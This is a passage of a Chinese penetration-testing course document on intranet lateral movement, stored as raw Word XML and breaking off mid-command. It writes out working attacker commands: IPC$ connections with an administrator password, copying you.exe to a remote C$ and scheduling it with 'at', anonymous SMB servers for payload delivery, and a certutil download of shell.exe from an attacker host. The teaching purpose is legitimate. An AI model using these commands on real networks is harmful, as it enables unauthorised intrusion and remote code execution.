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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="内网横向移动"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">免责声明： </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本课程内容仅限于网络安全教学，不得用于其他用途。任何利用本课程内容从事违法犯罪活动的行为，都严重违背了该课程设计的初衷，且属于使用者的个人行为与讲师无关，讲师不为此承担任何法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>希望同学们知法、懂法、守法，做一个良好公民。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内网横向移动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>横向移动(Lateral Movement)是从一个感染主机迁移到另一个受感染主机的过程。一旦进入内部网络，测试人员就会将已被攻陷的机器作为跳板，继续访问或控制内网中的其他机器，直到获取机密数据或控制关键资产。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>横向移动包括用来进入内部网络和控制网络上的远程系统的技术。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="一横向移动中的文件传输"/>
      <w:r>
        <w:t>一、横向移动中的文件传输</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="Xf43e56d38b560cd5d58068a4323e038169ca0e8"/>
      <w:r>
        <w:t>1、通过网络共享</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Windows系统中的网络共享功能可以实现局域网之间的文件共享。提供有效的用户凭据，用户可以将文件从一台机器传输到另一台机器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>net share</w:t>
      </w:r>
      <w:r>
        <w:t>命令，获得windows系统默认开启的网络共享，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>C$</w:t>
      </w:r>
      <w:r>
        <w:t>为C盘共享，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>ADMIN$</w:t>
      </w:r>
      <w:r>
        <w:t>为系统目录共享</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”，通过提供用户名密码建立了一条安全的、加密的、用于数据交换的通道。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3810635" cy="2484120"/>
            <wp:effectExtent l="0" t="0" r="146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810635" cy="2484120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>通过IPC$连接，不仅可以进行所有文件共享操作，还可以实现其他远程管理操作，如列出远程主机进程、在远程主机上创建计划任务或系统服务等，这在内网横向移动中起着至关重要的作用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 建立IPC$连接的条件：①远程主机开启了IPC连接。②远程主机的139端口和445端口开放。③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取了目标的账号密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ①与远程主机建立IPC连接</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>net use \\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.118.118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>\IPC$ "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>X123456@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>" /user:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5483225" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="317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483225" cy="647700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ②列出远程主机的C盘共享目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">dir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "\\\\IP\\c$" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.118.118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\c$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4411980" cy="208788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411980" cy="2087880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ③使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r>
        <w:t>命令通过共享连接向远程主机上复制文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>copy .\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "\\\\IP\\C$" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.118.118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\C$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485765" cy="2292985"/>
            <wp:effectExtent l="0" t="0" r="63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485765" cy="2292985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="2292350"/>
            <wp:effectExtent l="0" t="0" r="508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481320" cy="2292350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用at命令创建计划任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>at \\192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:47 c:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>you.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#添加计划任务</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="Xcc18499d1d504f4b5f047f872c02dfa277d31f2"/>
      <w:r>
        <w:t>2、搭建smb服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t>SMB(Server Message Block，服务器消息块)，又称CIFS(Common Internet File System，网络文件共享系统)，主要功能是使网络上的计算机能够共享计算机文件、打印机、串行端口和通信等资源。SMB消息一般用NetBIOS协议或者TCP发送，分别使用139或445端口，目前倾向于使用445端口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>实战中测试人员可以在自己的服务器或当前所控制内网主机上搭建SMB服务器，将需要的文件放到smb服务器的共享目录，并指定UNC路径，让横向移动的目标主机能远程加载SMB共享的文件。注意，需要使用SMB匿名共享，并且搭建的SMB服务器能被目标访问到。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ①、在linux系统上，利用smbserver.py搭建smb服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>mkdir /root/share</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-smbserver evilsmb /root/share -smb2support </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ②、在windows系统上，如果已经获得了管理员权限，可以配置SMB匿名共享</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 也可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Invoke-BuildAnonymousSMBServer.ps1</w:t>
      </w:r>
      <w:r>
        <w:t>在本地快速启动一个匿名共享。需要本地管理员权限执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以管理员权限运行cmd，键入管理员账号密码：administrator/X123456@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 开启可匿名访问的文件共享服务器：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>powershell -exec bypass -command "import-module ./Invoke-BuildAnonymousSMBServer.ps1;Invoke-BuildAnonymousSMBServer -Path c:\share -Mode Enable"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5484495" cy="2442845"/>
            <wp:effectExtent l="0" t="0" r="190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484495" cy="2442845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485130" cy="1848485"/>
            <wp:effectExtent l="0" t="0" r="127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485130" cy="1848485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "\\\\192.168.118.100\\smb" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\\192.168.118.100\smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3284220" cy="95250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3284220" cy="952500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 关闭可匿名访问的文件共享服务器：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>Invoke-BuildAnonymousSMBServer -Path c:\share -Mode Disable</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="Xbdb42c3cb9d4980c0dcdf8cbb4b378d529fd95c"/>
      <w:r>
        <w:t>3、通过Windows自带工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> ①Certutil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python -m http.server   #启动http服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="1436370"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1143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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5481320" cy="1436370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>certutil -urlcache  -f http://IP:Port/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="35"/>
        </w:rPr>
        <w:t>.exe C:\</w:t>
